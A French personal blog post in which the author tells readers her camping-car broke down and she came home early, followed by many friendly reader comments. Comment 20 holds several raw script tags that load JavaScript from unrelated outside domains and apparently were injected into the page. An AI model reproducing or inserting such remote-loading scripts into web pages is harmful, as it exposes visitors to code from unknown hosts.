• Je suis de retour....

     

    Je suis de retour....

     

     

     

    Me revoici plus tôt que prévu !!!! camping-car en panne, nous sommes rentrés chez nous 8 jours avant la fin de notre périple, avec une voiture fournie par l'assistance de l'Assurance....

     

     

    Je suis de retour....

     

     

    Notre camping-car est donc resté dans le Lot... Nous irons le rechercher quand il ira mieux....

     

    Notre moral est bon, ça fait parti des aléas et tant que c'est matériel, relativiser est aisé....

     

    Mon blog reprendra du service dans quelques jours, le temps que je prépare mes posts pour vous montrer ce que j'ai trouvé dans ma bal à mon retour, les photos de nos vacances... Puis mes créations réalisées avant mon départ....

     

    En attendant, je vous fais de GROS...

     

     

    Je suis de retour....

     

     

     

     

    Je suis de retour....

     

     

     

     

     


    Tags Tags : , ,
  • Commentaires

    38
    Vendredi 14 Août 2020 à 10:58

    Juste un petit coucou pour le week end ma Valie et passe un bon 15 aout je suis de tout coeur avec toi, les orages n ont guére arrété cette moiteur et cette chaleur qui ryègnent dans les appartements je pense qu il faudra plusieurs jours, ça rend un tantinet malade plus le reste porte toi bien bisous tendresse

    37
    Jeudi 13 Août 2020 à 17:01

    Effectivement c'est rageant, mais vaut mieux toujours ça qu'un souci de santé ou plus grave ! Là comme tu dis ce n'est que matériel ! Et mieux vaut également plus proche de la fin du séjour qu'au début ! J'espère que vous en avez malgré tout bien profité et ai hâte de voir vos aventures !!
    Gros Bisous et Bon retour ici !!

    36
    Mardi 11 Août 2020 à 22:55

    Quel dommage ! j'espère que cette panne ne sera pas trop importante quand même ;

    bonne soirée ; bises / Nicole

    35
    Mardi 11 Août 2020 à 21:39
    bibikafeine

    Bon retour. Tu as raison de réagir positivement. A très bientôt. Bises

    34
    Jeannine (cristal24)
    Mardi 11 Août 2020 à 18:42

    Coucou Valie,

    Bon retour à toi.

    Moi je ne suis que de passage chez moi, avant de partir vraiment en vacances, mais sans enthousiasme; tout d'abord à cause du virus et en plus avec cette chaleur qui me fatigue.

    Je regrette presque d'avoir réservé un gîte depuis février, car c'était plus pour mes petites filles qu'on devait amener, mais finalement, ma fille ne veut pas les laisser partir.....à cause du virus bien sûr.

    Dommage.  J'ai hâte d'être de retour !!!yes

    A bientôt.  Grosses bises.

    Jeannine

     

    33
    Lundi 10 Août 2020 à 23:00

    Mince de mince, c'est ballot cette histoire mais tu as raison, tant que c'est mécanique, c'est moins grave que lorsqu'il y a un accident corporel.

    Alors sois vigilante car depuis ton départ en vacances il y a plein de problème avec les blogs et là, je n'ai pas reçu ton alerte du 7, juste celui d'aujourd'hui, c'est ainsi que je suis, moi aussi, remontée dans le temps.

    Gros bisous et bon retour chez vous

    32
    Lundi 10 Août 2020 à 21:22

    Bon retour chez toi malgré les désagréments

    mais c'est que matériel .

    bisous bonne soirée

    31
    Lundi 10 Août 2020 à 17:52

    Coucou

    Pas de chance retour anticipé pour vous

    J'espère que la panne n'est pas trop grave, c'est pas drôle et sa a gâché la fin de votre séjour, de plus il va vous falloir retourner chercher le camping

    En attendant bon retour chez toi, et repose toi au frais si tu le peux

    A plus tard

    Bisous

     

    30
    Lundi 10 Août 2020 à 15:03

    contente de te revoir .c'est vraiment ennuyeux pour ton camping car. bisous liliane

    29
    Dimanche 9 Août 2020 à 12:42

    oh !!!!!!! mince pour cet aléa mais bon comme tu le dis ce n'est que matériel !!!

     aussi  il  faut  voir  les  choses  avec recul   et  la  prochaine  fois  les  vacances  ne  seront  que  mieux

     courage et  gros  bisous

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    28
    Dimanche 9 Août 2020 à 11:22

    Bonjour ma douce Valie

    Je te souhaite une bonne journée de dimanche

    Ici il fait très chaud en zone canicule

    Prends bien soin de toi et de ta famille

    gros bisous 

    ton amie Janine

    27
    Dimanche 9 Août 2020 à 02:44

    Kikou Valie ,

    Alors voici des vacances qui sont abrégées mais comme tu le dis tant qu'il n'y a pas de blessés humains c'est plus acceptable. J'espère tu pourras poursuive tes vacances avec ta petite famille chez toi quand même.On dirait bien que l'année 2020 n'est pas très gaie pour bien des gens...!!!

    Bon dimanche à toi et bon Dimanche et bonne fin de vacances malgré les aléas.

    StellaC

    26
    Qinoa
    Samedi 8 Août 2020 à 18:49
    Oh zut, c’aest pas de chance ☹️. Profitez quand même de lui. Des vacances chez vous
    Bzz
    25
    Samedi 8 Août 2020 à 17:18

    Coucou Valie

    Contente de te lire malgré une fin de vacances un peu turbulente, mais ce n'est que matériel

    l'essentiel est que ayez passé de belles vacances

    A bientôt Gros bisous Pierrette67

    24
    luce
    Samedi 8 Août 2020 à 14:15

    Bon retour,  les aléas de la route  permettront de retourner dans le Lot magnifique région aussi Amicalement

    23
    Samedi 8 Août 2020 à 11:26

    bon retour chez toi ! tu as raison de prendre ce contretemps  avec le moral !

    gros bisous

     

    22
    Samedi 8 Août 2020 à 09:23

    ravie de pouvoir te lire a nouvel, mais désolé pour votre camping car

    bisous

    21
    Samedi 8 Août 2020 à 09:18

    Tu as raison il faut relativiser même si ça fait rager. Retourner le chercher vous donnera l'occasion de continuer vos vacances plus tard. Bon retour parmi nous. Gros bisous

    20
    mamijojo77100
    Samedi 8 Août 2020 à 08:00

    cc valie retour force helas mais gardez les bons souvenirs de semaines a voyager c est le principal. LE PLUS EMBETANT DANS TOUT CAS, c est que ca coute quand meme!! et puis le beau temps EST TJS LA profitez de votre chez vous!!  MERCI ENCORE pour ton envoi. JE PENSE QUE TU A RECU MON MAIL EN SON TEMPS.. BON WE et a bientot  joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1596866212479" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    19
    Vendredi 7 Août 2020 à 20:38

    Bonsoir ma chère Valie

    Une panne zut alors même si ce n'est pas grave !

    J'espère que tu as passé de bonnes et belles vacances

    tu rentres en pleine canicules ! alors surtout prends bien soin de toi !

    Bonne soirée et à bientôt , gros bisous

    Janine

    18
    Vendredi 7 Août 2020 à 20:12

    Ravie de te retrouver même si c'est en avance de 8 jours. Pour ma part, je suis rentrée aussi mais je ne publierai qu'en septembre. Je profite de ma vie "sans enfants" lol ! 

    Bises

    Thaly 

    17
    Vendredi 7 Août 2020 à 18:37

    Coucou ma tite Valie, trop contente de te revoir parmi nous !!

    A part ce souci qui a écourté votre séjour, mais comme tu dis il faut relativiser, je vois que tu as le moral & que vous avez profité durant vos vacances.

    A très vite de te lire ma Douce Amie.

    Mille Bisous tout doux.

    16
    Vendredi 7 Août 2020 à 18:20

    Ravie de te retrouver Valie ! Pas de chance pour le retour anticipé mais comme tu le dis tant que ce n'est que du matériel en panne on peut s'en remettre... J'ai hâte de voir tes prochains articles !

    Bisous bisous !

    15
    Vendredi 7 Août 2020 à 17:49
    Très contente de ton retour. C'est très bien de prendre la vie comme tu la prends. C'est moins contraignant. Le principal c'est d'avoir fait un beau voyage et que tout le monde aille bien. Ce n'est que du matériel. Bravo ma chère Valie. À très bientôt!
    14
    gaelle
    Vendredi 7 Août 2020 à 17:23
    j'admire ton optimisme et bon retour sur la blogo biz biz biz gaelle
    13
    Vendredi 7 Août 2020 à 17:11

    Coucou Valie, Bon retour chez toi,

    et oui il faut relativiser vous êtes en bonne santé

    Espèrons que cela ne vous coûtera pas trop cher

    Bon week-end bises

    12
    Vendredi 7 Août 2020 à 16:30

    Comme on dit au Québec, c'est le fun de te retrouver et j'ai bien hâte de voir tes photos, tes nouvelles créations et ce que tu as eu dans ta Bal. Rebienvenue chez-toi, tu t'es bien reposée et amusée mais c'est dommage pour vos 8 jours perdus mais comme tu dis, ce n'es que du matériel et ce n'est pas un accident. Passe un beau week-end, gros bisous !

    11
    Vendredi 7 Août 2020 à 14:49
    lamanuelle25

    Bon retour chez toi en espérant que la réparation ne sera pas trop onéreuse!!! Bisous Nadine

    10
    Vendredi 7 Août 2020 à 14:46

    Bon retour sur la blogosphère ! Dommage pour ce problème mais le principal c'est que vous avez bien profité et que vous allez bien.

    Bonne fin de journée.
    Bises.

    9
    marianne pirotte
    Vendredi 7 Août 2020 à 13:32

    Heureuse de te revoir !! J'espère que tu as bien profité de tes vacances ....

    Gros bisous bien chaud

    Marianne

    8
    Vendredi 7 Août 2020 à 11:13
    Heureuse de te retrouver après ces vacances écourtées ! Tu as raison de relativiser ! Je suis sur la route pour retrouver ma fille après 1 an sans se voir et découvrir ma nouvelle petite fille ! Bisous et à très bientôt
    7
    Vendredi 7 Août 2020 à 10:55

    Bonjour ma Valie, je suis ravie de te retrouver, désolée pour ton camping car, ce n'est que matériel fort heureusement....Le principal est qu'il vous ai fait faire de jolis voyages.....

    Je te souhaite une bonne journée suivi d'un bon W.E

    Gros bisous de Pat

    6
    Vendredi 7 Août 2020 à 10:24

    Un réel plaisir de te retrouver Valie...Désolée pour cette vilaine panne,qui tombe loin de chez vous...

    Tu vas avoir bien des choses a faire pour reprendre

    tes habitudes...mais si les Vacances était agréables 

    c'est le principal...Bon retour sur ton joli blog

    qui enchante toujours mon Coeur..Bisous ma Douce Amie...Je connais le Lot,j'y habite...Hi...hi...

    A bientôt*Bonne reprise*

    5
    Jacline-H-49
    Vendredi 7 Août 2020 à 10:14

    Bonjour chère Valie,

    suis heureuse de te revoir, et malheureuse pour le cc et les factures qui vont en découler.

    Vous avez fait le maximum de promenades avec lui, c'est ça qu'il faut garder en mémoire. 

    Bien à l'abri à l'ombre chez vous, pour résister aux 39/40° annoncés, même si tu aimes la chaleur, il y a un moment où trop c'est trop pour l'organisme.

    Bonne journée, tu ne vas pas manquer d'occupations diverses et intéressantes.

    GROS BISOUS TENDRESSE de 

    Jacline 

     

     

    4
    Vendredi 7 Août 2020 à 10:06

    Bienvenue chez toi Valie et parmi nous.. j'ai bien aimé suivre le joli périple que vous avez fait en France.. très agréable malgré cette fin de vacances écourtée, rien de grave et nous payons si cher nos assurances que pour une fois... Contente de te retrouver Valie. Bonne reprise. Merci pour ton envoie, quel plaisir ! Je t'embrasse, attention aux chaleurs et au virus qui rôde toujours. A très vite Valie.

    3
    Vendredi 7 Août 2020 à 10:04
    dane

    coucou ma Valie, c' est moche quand ça arrive mais comme tu dis il faut positivé tant que c' est matériel c' est les factures qui sont douloureuses, j' en sais quelque chose, courroie de distribution a changer sur ma voiture les pneus, après c' est notre téléviseur et hier le frigo qui lâche après 12 années de bons et loyaux services, nous avons passés nos vacances chez Darty lol!!  a bientôt bisous 

    2
    Jour de mai
    Vendredi 7 Août 2020 à 10:03

    Coucou Valie, 

    Heureuse de te retrouver même si effectivement les vacances auraient pu se terminer d'une autre façon mais comme tu le dis, plus facile de relativiser lorsque ce n'est que du matériel, le CC n'a pas apprécié que vous disiez vouloir vous séparer de lui après de bons et loyaux services. 

    Tu dois apprécier le temps qu'il fait en ce moment et surtout le blog reprendra lorsque tu auras refait "surface" après ce temps d'absence. Tu nous as manqué.

    Belle Journée suivie d'un excellent week end. 

    Gros bisous ♥♥♥♥

    LN

    1
    Vendredi 7 Août 2020 à 09:56

    Moi aussi j etais dans le Lot ma douce que je suis heureuse de te revoir, bien sur pas de ce qui vous arrive mais de te retrouver , toi et ta gentillesse au moment ou je ferme mon blog pour quelques jours car je ne vais pas bien du tout , je ne fais que des allers et retours à l hopital de Marseille et je souffre énormément

    Sinon mes 15 jours dans le Lot furent magnifiques et j ai marché, bien mangé , et surtout bien dormi, ici seule à nouveau rien ne va mais cela avait commencé la veille de mon départ là-bas , plus ici 35 dans ma chambre je suis exténuée , ravie encore une fois de ton retour toi ma grande amie de coeur avec ambrounette qui s sinquiète pour moi prends soin de toi ce week end et j ai hate de revoir tes posts bisous tendresse

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :